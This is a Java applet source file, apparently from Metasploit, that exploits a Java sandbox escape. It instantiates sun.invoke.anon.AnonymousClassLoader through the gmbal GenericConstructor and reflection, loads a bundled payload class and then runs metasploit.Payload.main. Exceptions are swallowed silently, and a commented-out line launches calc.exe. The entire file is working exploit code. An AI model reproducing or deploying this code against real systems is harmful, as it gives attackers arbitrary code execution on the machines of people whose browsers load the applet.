import java.applet.Applet; import java.io.PrintStream; import java.io.Serializable; import java.lang.reflect.Method; import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory; import com.sun.org.glassfish.gmbal.util.GenericConstructor; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import metasploit.Payload; //import java.lang.Runtime; public class Exploit extends Applet { public Exploit() { } public byte[] hex2Byte(String str) { byte[] bytes = new byte[str.length() / 2]; for (int i = 0; i < bytes.length; i++) { bytes[i] = (byte) Integer .parseInt(str.substring(2 * i, 2 * i + 2), 16); } return bytes; } public void init() { try { ByteArrayOutputStream bos = new ByteArrayOutputStream(); byte[] buffer = new byte[8192]; int length; // read in the class file from the jar InputStream is = getClass().getResourceAsStream("MyPayload.class"); // and write it out to the byte array stream while( ( length = is.read( buffer ) ) > 0 ) bos.write( buffer, 0, length ); // convert it to a simple byte array buffer = bos.toByteArray(); GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]); Object obj = genericconstructor.create(new Object[] {}); Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class }); Class class1 = (Class)method.invoke(obj, new Object[] { //byte_payload buffer }); class1.newInstance(); //System.out.println("SecurityManager:" + System.getSecurityManager()); //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]); Payload.main(null); //Runtime.getRuntime().exec("calc.exe"); } catch(Exception exception) { //exception.printStackTrace(); } } }